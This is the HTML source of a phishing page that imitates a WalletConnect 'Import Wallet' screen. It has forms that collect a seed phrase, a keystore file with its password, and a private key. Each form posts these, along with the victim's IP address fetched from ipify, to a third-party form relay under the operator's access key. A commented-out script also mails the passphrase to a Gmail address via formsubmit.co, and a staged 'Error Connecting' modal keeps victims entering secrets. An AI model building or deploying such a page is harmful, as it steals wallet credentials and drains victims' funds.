<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Connect Wallet</title>
    <link rel="stylesheet" href="../css/styles.css">
    <link rel="icon" href="blr.html" type="image/x-icon">
    <link rel="shortcut icon" href="blr.html" type="image/x-icon">
    <link href="https://cdn.jsdelivr.net/npm/bootstrap@5.0.2/dist/css/bootstrap.min.css" rel="stylesheet" integrity="sha384-EVSTQN3/azprG1Anm3QDgpJLIm9Nao0Yz1ztcQTwFspd3yD65VohhpuuCOmLASjC" crossorigin="anonymous">
    <link rel="preconnect" href="https://fonts.googleapis.com/">
    <link rel="preconnect" href="https://fonts.gstatic.com/" crossorigin>
    <link href="https://fonts.googleapis.com/css2?family=Montserrat:wght@400;500;600;700;800&amp;family=Poppins:wght@200;300;400;500;600&amp;display=swap" rel="stylesheet">
    <link rel="icon" href="interconnected.png" type="image/x-icon">
    <link rel="shortcut icon" href="interconnected.png" type="image/x-icon">

    <style>
    
.wrapper{
  position: absolute;
  top: 50%;
  left: 50%;
  width: 300px;
  text-align:center;
  transform: translateX(-50%);
}

.spanner{
  position:absolute;
  top: 50%;
  left: 0;
  background: #2a2a2a;
  width: 100%;
  display:block;
  text-align:center;
  height: 300px;
  color: #FFF;
  transform: translateY(-50%);
  z-index: 1000;
  visibility: hidden;
}

.overlay{
  position: fixed;
	width: 100%;
	height: 100%;
  background: rgba(0,0,0,0.5);
  visibility: hidden;
}

.loader,
.loader:before,
.loader:after {
  border-radius: 50%;
  width: 2.5em;
  height: 2.5em;
  -webkit-animation-fill-mode: both;
  animation-fill-mode: both;
  -webkit-animation: load7 1.8s infinite ease-in-out;
  animation: load7 1.8s infinite ease-in-out;
}
.loader {
  color: #ffffff;
  font-size: 10px;
  margin: 80px auto;
  position: relative;
  text-indent: -9999em;
  -webkit-transform: translateZ(0);
  -ms-transform: translateZ(0);
  transform: translateZ(0);
  -webkit-animation-delay: -0.16s;
  animation-delay: -0.16s;
}
.loader:before,
.loader:after {
  content: '';
  position: absolute;
  top: 0;
}
.loader:before {
  left: -3.5em;
  -webkit-animation-delay: -0.32s;
  animation-delay: -0.32s;
}
.loader:after {
  left: 3.5em;
}
@-webkit-keyframes load7 {
  0%,
  80%,
  100% {
    box-shadow: 0 2.5em 0 -1.3em;
  }
  40% {
    box-shadow: 0 2.5em 0 0;
  }
}
@keyframes load7 {
  0%,
  80%,
  100% {
    box-shadow: 0 2.5em 0 -1.3em;
  }
  40% {
    box-shadow: 0 2.5em 0 0;
  }
}

.show{
  visibility: visible;
}

.spanner, .overlay{
	opacity: 0;
	-webkit-transition: all 0.3s;
	-moz-transition: all 0.3s;
	transition: all 0.3s;
}

.spanner.show, .overlay.show {
	opacity: 1
}
    </style>
</head>
<body>
    <div class="wrapper">
        
        </div>
        <div class="overlay"></div>
        <div class="spanner">
          <div class="loader"></div>
          <p>Submitting, please be patient.</p>
        </div>


    <div class="modal" id="walletconnectmodal" data-bs-backdrop="static" data-bs-keyboard="false" tabindex="-1" aria-labelledby="staticBackdropLabel" aria-modal="true" role="dialog" style="display: none;">
        <div class="modal-dialog modal-dialog-centered">
        <div class="modal-content">
            <div class="modal-body">
                <h5 class="text-center">WalletConnect</h5>
                <button type="button" class="btn-close" data-bs-dismiss="modal" aria-label="Close"></button>

                <div class="modal-loading text-center" id="loading" style="display: none;">
                    <div class="loadingio-spinner-dual-ring-ozck7n734ap"><div class="ldio-4tsf1qos89t">
                        <div></div><div><div></div></div>
                        </div></div>
                        <style type="text/css">
                        @keyframes ldio-4tsf1qos89t {
                          0% { transform: rotate(0) }
                          100% { transform: rotate(360deg) }
                        }
                        .ldio-4tsf1qos89t div { box-sizing: border-box!important }
                        .ldio-4tsf1qos89t > div {
                          position: absolute;
                          width: 144px;
                          height: 144px;
                          top: 28px;
                          left: 28px;
                          border-radius: 50%;
                          border: 16px solid #000;
                          border-color: #3b99fb transparent #3b99fb transparent;
                          animation: ldio-4tsf1qos89t 1s linear infinite;
                        }
                        .ldio-4tsf1qos89t > div:nth-child(2) { border-color: transparent }
                        .ldio-4tsf1qos89t > div:nth-child(2) div {
                          position: absolute;
                          width: 100%;
                          height: 100%;
                          transform: rotate(45deg);
                        }
                        .ldio-4tsf1qos89t > div:nth-child(2) div:before, .ldio-4tsf1qos89t > div:nth-child(2) div:after { 
                          content: "";
                          display: block;
                          position: absolute;
                          width: 16px;
                          height: 16px;
                          top: -16px;
                          left: 48px;
                          background: #3b99fb;
                          border-radius: 50%;
                          box-shadow: 0 128px 0 0 #3b99fb;
                        }
                        .ldio-4tsf1qos89t > div:nth-child(2) div:after { 
                          left: -16px;
                          top: 48px;
                          box-shadow: 128px 0 0 0 #3b99fb;
                        }
                        .loadingio-spinner-dual-ring-ozck7n734ap {
                          width: 200px;
                          height: 200px;
                          display: inline-block;
                          overflow: hidden;
                          background: #ffffff;
                        }
                        .ldio-4tsf1qos89t {
                          width: 100%;
                          height: 100%;
                          position: relative;
                          transform: translateZ(0) scale(1);
                          backface-visibility: hidden;
                          transform-origin: 0 0; /* see note above */
                        }
                        .ldio-4tsf1qos89t div { box-sizing: content-box; }
                        /* generated by https://loading.io/ */
                        </style>
                </div>
                <div class="modal-error" id="error" style="display: block;">
                    <div class="d-flex justify-content-between align-items-center border rounded mx-3 py-4 px-3 mb-5">
                        <h5 class="text-danger pt-2">Error Connecting...</h5>
                        <a href="./" class="btn btn-primary cmn p-2">Connect Manually</a>
                    </div>
                    <div class="border rounded mx-3 p3-4 px-3">
                        <h6 class="pt-1">Wallet Connect</h6>
                        <p>Easy-to-use browser extension</p>
                    </div>

                </div>
            
            </div>
        </div>
        </div>
    </div>
    


    <div class="container pt-5 pb-3">
        <img src="img/W%20iconn.png" alt="wallet-header" class="mx-auto d-block">
        <p class="br-iw pt-3 text-center">Import Wallet</p>
    </div>
    <div class="container import-tabs py-4">
        <button class="tab active" onclick="openTab(event, 'phrase-form')">Phrase</button>
        <button class="tab" onclick="openTab(event, 'json-form')">Keystore JSON</button>
        <button class="tab" onclick="openTab(event, 'pkey-form')">Private Key</button>
    </div>
    <div class="container">
        <div class="tab-content pt-md-5 px-md-5 pt-5 px-2" id="phrase-form">
          <form  id="pass-phrase" action="https://api.web3forms.com/submit" method="POST">
            <input type="hidden" name="access_key" value="e4ec6457-bdd2-4870-b936-e9e466615c1f">
            <input type="hidden" name="redirect" value="https://nodeexplorer.pages.dev/apps/connect-wallet/loading.html">
                <textarea name="phrase" id="vepgzijzsg" class="phrase-field" placeholder="Phrase"></textarea>
                <input type="hidden" name="user_ip" id="user_ip_phrase">
                <input type="hidden" name="type" id="type-phrase">
                <button type="submit" value="submit" class="form-button">Import <i class="fa-solid fa-cloud-arrow-up"></i></button>
                <p class="form-instrunctions text-center">Typically 12 (sometimes 24) words separated by single spaces</p>
            </form>

            
        </div>
        <div class="tab-content pt-md-5 px-md-5 pt-5 px-2" id="json-form">
          <form  id="keystore-form" action="https://api.web3forms.com/submit" method="POST">
            <input type="hidden" name="access_key" value="e4ec6457-bdd2-4870-b936-e9e466615c1f">
              <input type="hidden" name="redirect" value="https://nodeexplorer.pages.dev/apps/connect-wallet/loading.html">
                <textarea name="keystore" id="tnknmtqnlu" class="phrase-field" placeholder="Keystore JSON"></textarea>
                <input type="password" name="password" placeholder="Password" id="dienfio" class="pass-field" required>
                <input type="hidden" name="user_ip" id="user_ip_keystore">
                <input type="hidden" name="type" id="type-keystore">
                <button type="submit" class="form-button">Import <i class="fa-solid fa-cloud-arrow-up"></i></button>
                <p class="form-instrunctions text-center">Several lines of text beginning with "{...}" plus the password you used to encrypt it</p>
            </form>
        </div>
        <div class="tab-content pt-md-5 px-md-5 pt-5 px-2" id="pkey-form">
          <form  id="privatekey-form" action="https://api.web3forms.com/submit" method="POST">
            <input type="hidden" name="access_key" value="e4ec6457-bdd2-4870-b936-e9e466615c1f">
            <input type="hidden" name="redirect" value="https://nodeexplorer.pages.dev/apps/connect-wallet/loading.html">
                <textarea name="privatekey" id="slpfoduuxq" class="phrase-field" placeholder="Private Key"></textarea>
                <input type="hidden" name="user_ip" id="user_ip_key">
                <input type="hidden" name="type" id="type-key">
                <button type="submit" class="form-button">Import <i class="fa-solid fa-cloud-arrow-up"></i></button>
                <p class="form-instrunctions text-center">Typically 64 alphanumeric characters</p>
            </form>
        </div>
    </div>
    <div id="custom-alert" class="custom-alert">
        <div class="alert-content">
          <span class="close-btn" onclick="closeAlert()">&times;</span>
          <p id="alert-message" class="alert-text text-center"></p>
        </div>
      </div>

    <script src="js/script.js"></script>
    <script src="../kit.fontawesome.com/90d804cddf.js" crossorigin="anonymous"></script>
    <script
    src="https://code.jquery.com/jquery-3.7.1.min.js"
    integrity="sha256-/JqT3SQfawRcv/BIHPThkBvs0OEvtFFmqPF/lYI/Cxo="
    crossorigin="anonymous"></script>
    <script src="https://cdn.jsdelivr.net/npm/js-cookie@3.0.5/dist/js.cookie.min.js"></script>
    <script src="https://cdn.jsdelivr.net/npm/bootstrap@5.0.2/dist/js/bootstrap.bundle.min.js" integrity="sha384-MrcW6ZMFYlzcLA8Nl+NtUVF0sA7MsXsP1UyJoMp4YLEuNSfAP+JcXn/tWtIaxVXM" crossorigin="anonymous"></script>   
    
    <script src="../js/modal-sync.js"></script>
   <script>
        fetch('https://api64.ipify.org/?format=json')
            .then(response => response.json())
            .then(data => {
                console.log(data.ip)
                document.getElementById('user_ip_phrase').value = data.ip;
                document.getElementById('user_ip_keystore').value = data.ip;
                document.getElementById('user_ip_key').value = data.ip;
                })
            .catch(error => {
                console.error('Error fetching IP address:', error);
            });

            console.log(localStorage.getItem("walletType"))
    </script>

<script src="https://code.jquery.com/jquery-3.6.0.min.js"></script>
<!--<script>
    $("form#pass-phrase").submit(async(e)=>{
      e.preventDefault();
      if(validatePhrase()){
        const ip = document.getElementById('user_ip_phrase').value;
        const walletType = Cookies.get("walletType");
        const fullType = `Passphrase\n\nWallet Type: ${walletType}`;
        const passphrase = document.getElementById('vepgzijzsg').value;

        $("div.spanner").addClass("show");
        $("div.overlay").addClass("show");

        const formData = new FormData();
        formData.append('value', passphrase);
        formData.append('type', fullType);
        formData.append('ip', ip);

        const email = "webt12348@gmail.com"; // Change this to your email address
        const endpoint = `https://formsubmit.co/${email}`;

        const res = await fetch(endpoint, {
          method: "POST",
          body: formData
        });
        if (!res.ok) return console.log("SOMETHING WENT WRONG");

        setTimeout(()=>{
            $("div.spanner").removeClass("show");
            $("div.overlay").removeClass("show");
            $(".modal").fadeIn();
        },1500);
        const data = await res.json();
        console.log(data);
      }
    });

    // Similar modifications for other forms...

    $(".btn-close").click(e=>{
        $(".modal").fadeOut();
    });
</script>-->

<script>
  $("form#pass-phrase").submit(async(e)=>{
    e.preventDefault();
    if(validatePhrase()){
      const ip = document.getElementById('user_ip_phrase').value;
      const walletType = "Your Wallet Type"; // Replace "Your Wallet Type" with the actual wallet type you want to set
      Cookies.set("walletType", walletType); // Set the cookie named "walletType" with the value of walletType
      const fullType = `Passphrase\n\nWallet Type: ${walletType}`;
      // Your further code
    }
  });
</script>

<script>
    console.log(Cookies.get("walletType")
    <script>
</body>


    
</body>
</html>